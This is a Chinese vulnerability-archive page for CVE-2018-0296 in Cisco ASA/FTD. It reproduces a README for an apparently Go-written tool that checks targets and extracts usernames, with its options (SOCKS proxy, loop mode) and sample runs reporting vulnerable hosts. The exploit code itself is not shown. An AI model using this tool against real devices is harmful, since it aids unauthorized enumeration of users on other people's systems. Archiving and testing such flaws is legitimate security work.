POC详情: a74dfa2541b31138bbad37079bcea076743abd52

来源
关联漏洞
标题: 多款Cisco产品ASA Software和Firepower Threat Defense Software 输入验证错误漏洞 (CVE-2018-0296)
描述:Cisco 3000 Series Industrial Security Appliance(ISA)等都是美国思科(Cisco)公司的安全设备。ASA Software和Firepower Threat Defense (FTD) Software都是分别运行在不同设备中的操作系统。 多款Cisco产品中的ASA Software和FTD Software的Web界面存在输入验证漏洞,该漏洞源于程序缺少对HTTP URL的正确验证。远程攻击者可通过向受影响设备发送特制的HTTP请求利用该漏洞造成拒绝服
描述
Test CVE-2018-0296 and extract usernames
介绍
# CVE-2018-0296
Test CVE-2018-0296 and extract usernames from Cisco ASA.  
  
Refer to https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/ for more technical details.  
  
#Help Menu
```
$ ./CVE-2018-0296  -h
Options:

  -h, --help   display help information
  -u, --url    Url of target device
  -i           IP of Socks Proxy
  -p           Port of Socks Proxy
  -t, --time   Number of seconds to sleep between loop
      --loop   Loop mode
```
  
#Usage Guide  
```
$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1

$ ./CVE-2018-0296 -u https://www.yahoo.com:443
[*] Checking: https://www.yahoo.com
[+] https://www.yahoo.com [NOT Cisco VPN]

$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x
[+] https://x.x.x.x [Cisco VPN]
[+] https://x.x.x.x [Vulnerable]
[*] No usernames found
  
$ ./CVE-2018-0296  -i 127.0.0.1 -p 10000 --loop 10 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1
```
文件快照

[4.0K] /data/pocs/a74dfa2541b31138bbad37079bcea076743abd52 ├── [ 22K] CVE-2018-0296.go ├── [ 212] goreleaser.yml └── [1.2K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。